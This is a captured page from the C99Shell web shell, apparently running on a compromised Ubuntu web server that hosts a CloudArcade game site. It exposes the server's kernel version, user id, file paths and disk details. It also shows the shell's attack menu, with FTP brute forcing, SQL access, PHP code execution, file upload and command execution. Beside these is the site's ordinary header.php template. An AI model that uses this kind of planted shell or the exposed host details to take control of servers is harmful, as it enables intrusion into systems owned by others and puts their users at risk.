!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/gamesdaddy/cloudarcade/content/themes/default/includes/   drwxr-xr-x
Free 13.23 GB of 57.97 GB (22.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     header.php (2.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <title><?php echo htmlspecialchars$page_title )?></title>
        <meta name="description" content="<?php echo substr(esc_string($meta_description), 0160?>">
        <?php
            
if(isset($game)){ //Game page
                
?>
                <meta name="twitter:card" content="summary_large_image" />
                <meta name="twitter:title" content="<?php echo htmlspecialchars$page_title )?>" />
                <meta name="twitter:description" content="<?php echo substr(esc_string($meta_description), 0200?>" />
                <?php
                
if(isset($game->thumb_1)){
                    
$thumb $game->thumb_1;
                    if(
substr($thumb01) == '/'){
                        
$thumb DOMAIN substr($thumb1);
                    }
                    echo(
'<meta name="twitter:image:src" content="'.$thumb.'">');
                    echo(
'<meta property="og:image" content="'.$thumb.'">');
                }
            }
        
?>
        <link rel="stylesheet" type="text/css" href="<?php echo DOMAIN TEMPLATE_PATH?>/style/bootstrap.min.css" />
        <link rel="stylesheet" type="text/css" href="<?php echo DOMAIN TEMPLATE_PATH?>/style/jquery-comments.css" />
        <link rel="stylesheet" type="text/css" href="<?php echo DOMAIN TEMPLATE_PATH?>/style/user.css" />
        <link rel="stylesheet" type="text/css" href="<?php echo DOMAIN TEMPLATE_PATH?>/style/style.css" />
        <!-- Font Awesome icons (free version)-->
        <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
        <!-- Google fonts-->
        <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css" />
        <link href="https://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic" rel="stylesheet" type="text/css" />
        <?php include  TEMPLATE_PATH "/parts/head.php" ?>
    </head>
    <body id="page-top">
        <!-- Navigation-->
        <nav class="navbar navbar-expand-lg navbar-dark top-nav" id="mainNav">
            <div class="container">
                <button id="toggler" class="navbar-toggler navbar-toggler-left collapsed" type="button" data-toggle="collapse" data-target="#navb" aria-expanded="false">
                    <span class="navbar-toggler-icon"></span>
                </button>
                <a class="navbar-brand js-scroll-trigger" href="<?php echo DOMAIN ?>"><img src="<?php echo DOMAIN .SITE_LOGO ?>" class="site-logo" alt="site-logo"></a>
                <?php include  TEMPLATE_PATH "/parts/navigation-top.php" ?>
                <?php show_user_profile_header() ?>
            </div>
        </nav>
        <div class="nav-categories">
            <div class="container">
                <?php include  TEMPLATE_PATH "/parts/navigation-categories.php" ?>
            </div>
        </div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--